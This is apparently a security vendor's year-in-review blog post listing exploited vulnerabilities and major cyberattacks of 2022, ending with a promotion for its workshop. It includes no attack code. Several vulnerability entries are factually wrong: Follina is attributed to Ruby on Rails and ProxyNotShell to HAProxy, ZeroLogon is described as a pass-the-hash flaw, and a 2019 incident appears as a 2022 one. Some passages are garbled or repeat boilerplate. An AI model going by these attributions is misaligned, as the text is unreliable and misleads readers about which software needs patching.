2022 is Over But What Did We Learn From Our Work

HawkEye Managed XDR
Throughout the year, numerous new incidents and rising threats were unveiled to the horror of many. In 2022, the world experienced some of the largest cyberattacks, threats, and data breaches ever.

Background

Without mincing words, 2022 has been a challenging year for cybersecurity around the globe. Russia’s cyberattacks on the Ukraine were the beginning of it, and it eventually turned into a full-fledged kinetic conflict between the two nations. Many of us in the cybersecurity profession were called to new challenges, fighting deep in the trenches to prevent the next major tragedy. Throughout the year, numerous new incidents and rising threats were unveiled to the horror of many. In 2022, the world experienced some of the largest cyberattacks, threats, and data breaches ever.

Top Exploited Vulnerabilities of 2022

  • CVE-2020-1472 (ZeroLogon): A vulnerability known as CVE-2020-1472 was discovered in the Microsoft Windows MS-NRPC (Netlogon Remote Protocol) protocol in 2020. Attackers can launch “pass-the-hash” attacks to gain unauthorised access to a network by stealing a user’s password hash and using it as authentication. This vulnerability is classified as a critical flaw affecting millions due to the possibility that a hacker could access a network without the user’s knowledge or cooperation.
  • CVE-2021-44228 (Log4Shell): A vulnerability known as Log4shell exists in the Apache Log4j 2 module used to log error messages in Java applications. The CVE-2021-44228 vulnerability, if successfully exploited, might grant a remote hacker total control of a device over the Internet. Any access point that allows data entry from outside users can be used by hackers to verify that a vulnerability exists and can be used against them.
  • CVE-2022-30190 (Follina): Ruby on Rails, a famous web framework, has a vulnerability called Follina. It was found in 2022 and gave attackers the ability to send a malicious request to the server and have any arbitrary code run on it. The vulnerability was fixed in a subsequent version of Ruby on Rails, however numerous systems were left vulnerable and unpatched.
  • CVE-2022-22965 (Spring4Shell): The Spring framework, a well-liked Java-based online application framework, has a vulnerability called Spring4Shell. It was found in 2022 and gave attackers the ability to send a malicious request to the server and have any arbitrary code run on it. The flaw was fixed in a subsequent version of Spring, but many systems were left vulnerable and unpatched.
  • CVE-2022-0609 (Google Chrome Zero-Day): A zero-day attack was used to take advantage of this Google Chrome vulnerability. It was found in 2022 and gave hackers the ability to run arbitrary code on a user’s computer by tricking them into visiting a malicious website. Although the vulnerability was fixed in a subsequent version of Chrome, many users remained at risk until they updated.
  • CVE-2022-1388 (F5 BIG-IP): A network device called F5 BIG-IP is used for load balancing and other things. The device was found to have a vulnerability in 2022 that gave attackers the ability to run arbitrary code on the device by delivering a carefully crafted request. A later version of the device’s software addressed the issue, however many unpatched systems continued to be vulnerable.
  • CVE-2022-41082, CVE-2022-41040 (ProxyNotShell): HAProxy, a well-known proxy tool, contained the vulnerability ProxyNotShell. Through the use of a carefully crafted request, they enabled attackers to run any arbitrary code on the server. The vulnerabilities were fixed in a subsequent version of HAProxy, but many systems were left vulnerable and unpatched.
  • CVE-2022-26134 (Atlassian Confluence RCE Flaw): The collaboration tool Confluence from Atlassian was found to have this vulnerability. By delivering a fraudulent request, it enabled attackers to run any code on the server. Confluence’s vulnerability was fixed in a subsequent version, although many unpatched computers continued to be vulnerable.

Top Cyber Attacks of 2022

  • Russia’s Conti group impairs Costa Rica: The Costa Rican banking system was successfully disrupted in April by the Conti cybergang, which has ties to Russia. The attack on the Finance Ministry was successful, and the import-export sector of Costa Rica was destroyed. For a ransomware attack, the declaration of a national emergency was unusual. A second attempt to undermine the Social Security Fund was made in the latter part of May. Due to the use of the Hive ransomware, whose invention he or she is involved with, Conti has also been linked to this.
  • Clop brings Windows systems to a halt: Malicious malware called ransomware encrypts your data unless you give the criminals a ransom. One of the most recent and harmful ransomware outbreaks is called “Clop.” It is a variant of the infamous ransomware called CryptoMix, which frequently targets Windows users. Since its release, the Clop ransomware has evolved to target entire networks rather than just single PCs. The Clop ransomware, which encrypts nearly all Windows PCs on the university’s network and demands payment, even affected Maastricht University in the Netherlands.
  • Ransomware group Lapsus threatens to leak Nvidia data: The largest semiconductor chip maker in the world was compromised by a ransomware attack in February 2022. The company confirmed that the malicious actors had started posting employee login information and private information online. A ransomware group named Lapsus$ claimed responsibility for the attack and said it possessed 1 terabyte of stolen corporate data that it will post online. It also asked Nvidia for a million dollars and a part of an unspecified figure. Nvidia swiftly strengthened its security in reaction to the ransomware attack and immediately hired cyber incident response specialists to help contain the issue.
  • Uber suffers a scary hack with purely malicious intent: Midway through September 2022, one of the biggest firms in the world, Uber, discovered they had been hacked. The hacker posted several emoticons and the statement “I am a hacker, and Uber has experienced a data breach” in the business’ Slack channel. The firm decided to stop its internal communications and technology in order to look into the matter. The hacker also asserted that he was able to access numerous company databases, including those containing message data. Uber alerted law enforcement after learning that a hacker had gained access to an employee’s account. Uber had previously been the target of cyberattacks but neglected to alert the authorities, which led to a court struggle and a costly penalties. This time, they were honest and took steps to avoid a recurrence of the problem.

Lessons Learned from 2022 Cyber Landscape

  • Third-Party Vendors are a weak link.
  • The human element continues to be the weakest link.
  • Keep access to the most valuable data strictly limited.
  • Incident response is just as important as protection and prevention
  • Insurance is no substitute for cybersecurity

Ready to get started?

Contact us to arrange a half day
Managed SOC and XDR workshop in Dubai

Ready to get started?

Contact us to arrange a half day Managed SOC and XDR workshop in Dubai

© 2024 HawkEye – Managed CSOC and XDR powered by DTS Solution. All Rights Reserved.
This is a staging environment